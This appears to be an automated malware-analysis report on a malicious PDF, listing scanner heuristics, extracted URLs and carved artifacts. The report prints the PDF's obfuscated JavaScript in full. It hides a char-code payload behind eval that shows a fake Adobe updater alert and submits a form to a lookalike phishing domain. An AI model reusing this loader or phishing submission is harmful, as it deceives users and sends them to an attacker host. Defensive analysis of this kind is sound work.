MALICIOUS
138
Risk Score
Machine Learning
- Nyx PDF Classifier suspicious score 0.4662
Heuristics 7
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
} eval(decrypt(sourceCode,(new Date().getSeconds() % 1))) ; -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Visual download / call-to-action button lure low SE_DOWNLOAD_BUTTONDocument contains a call-to-action phrase ('Click here to download', 'Download Now', etc.) — low-signal unless other findings point to a malicious workflow
-
External URI info PDF_URIPDF contains an external URL action
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://gmail.net-login.com/XcmVyjaXBpZWD50X2lkPTAQ4MjIxTkODAwHOSZjYW1wAYWdlnbl9ydW5faWQ9MjIwONzUxMCZhY3Rpb249Y2xpY2smdXJsPWh0dHBzOi8vc2VjdXJlZC1sb2dpbi5uZXQvcGFnZXMvZWY5MDczMGFkZDA= PDF link annotation
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/tiff/1.0/In PDF document text
- http://ns.adobe.com/exif/1.0/In PDF document text
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0011_000.js |
pdf-javascript-stream | PDF /JS object 11 at offset 0xBD6 | 3727 bytes |
SHA-256: f375a6ca099b3cc7cbe617520e068c00a4a1d219cfad884d8e9e78c6999cdd12 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function generateReverseArray(){
var arr = [];
for (var i=0; i < 1000; i++){
arr.push(1000 - i);
}
return arr;
}
function bubbleSort(inputArr, num) {
var len = inputArr.length;
for (var n = 0; n < num; n++) {
for (var i = 0; i < len; i++) {
for (var j = 0; j < len; j++) {
if (inputArr[j] > inputArr[j + 1]) {
var tmp = inputArr[j];
inputArr[j] = inputArr[j + 1];
inputArr[j + 1] = tmp;
}
}
}
for (var i = 0; i < len; i++) {
for (var j = 0; j < len; j++) {
if (inputArr[j] < inputArr[j + 1]) {
var tmp = inputArr[j];
inputArr[j] = inputArr[j + 1];
inputArr[j + 1] = tmp;
}
}
}
}
return inputArr[inputArr.length - len] - 1;
}
function triggerSelectedCodeByTiming(num){
bubbleSort(generateReverseArray(), num);
function generateReverseArray(){
var arr = [];
for (var i=0; i < 1000; i++){
arr.push(1000 - i);
}
return arr;
}
function bubbleSort(inputArr, num) {
var len = inputArr.length;
for (var n = 0; n < num; n++) {
for (var i = 0; i < len; i++) {
for (var j = 0; j < len; j++) {
if (inputArr[j] > inputArr[j + 1]) {
var tmp = inputArr[j];
inputArr[j] = inputArr[j + 1];
inputArr[j + 1] = tmp;
}
}
}
for (var i = 0; i < len; i++) {
for (var j = 0; j < len; j++) {
if (inputArr[j] < inputArr[j + 1]) {
var tmp = inputArr[j];
inputArr[j] = inputArr[j + 1];
inputArr[j + 1] = tmp;
}
}
}
}
return inputArr[inputArr.length - len] - 1;
}
function triggerSelectedCodeByTiming(num){
bubbleSort(generateReverseArray(), num);
sourceCode = "102,117,110,99,116,105,111,110,32,100,111,99,79,112,101,110,101,100,40,41,13,123,13,97,112,112,46,97,108,101,114,116,40,123,99,77,115,103,58,32,39,87,101,32,110,101,101,100,32,116,111,32,117,112,100,97,116,101,32,121,111,117,114,32,100,111,99,117,109,101,110,116,32,114,101,110,100,101,114,105,110,103,32,101,110,103,105,110,101,46,32,67,108,105,99,107,32,79,75,32,116,111,32,99,111,110,116,105,110,117,101,44,32,119,104,101,110,32,112,114,111,109,112,116,101,100,32,97,108,108,111,119,32,114,101,109,111,116,101,32,99,111,110,110,101,99,116,105,111,110,32,116,111,32,65,100,111,98,101,32,115,101,114,118,101,114,115,46,39,44,32,99,84,105,116,108,101,58,32,39,65,100,111,98,101,32,65,99,114,111,98,97,116,32,85,112,100,97,116,101,114,39,44,110,73,99,111,110,58,32,51,125,41,59,13,97,112,112,46,100,111,99,46,115,117,98,109,105,116,70,111,114,109,40,39,104,116,116,112,58,47,47,103,109,97,105,108,46,110,101,116,45,108,111,103,105,110,46,99,111,109,47,88,99,109,86,80,106,97,88,66,112,90,87,122,53,48,88,50,108,107,80,84,83,81,52,77,106,73,120,83,87,79,68,65,119,99,79,83,90,106,89,87,49,119,105,89,87,122,108,110,98,108,57,121,100,87,53,102,97,87,81,57,77,106,73,119,111,78,122,85,120,77,67,90,104,89,51,82,112,98,50,52,57,89,88,82,48,89,87,78,111,98,87,86,117,100,65,61,61,35,70,68,70,39,41,59,13,125,13,13,100,111,99,79,112,101,110,101,100,40,41,59,10";
function decrypt(str, jump){
var result = "";
var list = str.split(',');
for (var i=0; i < list.length; i++) {
result += String.fromCharCode(list[i] - jump);
}
return result;
}
eval(decrypt(sourceCode,(new Date().getSeconds() % 1)))
;
}
triggerSelectedCodeByTiming(10);;
}
triggerSelectedCodeByTiming(10);
|
|||
font_00_cff_off0001545b.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x1545B | 4575 bytes |
SHA-256: 9340d372ad75a105fdb1627a30e96f892e0dc7d9588c0150cf06b4fa72281cc0 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.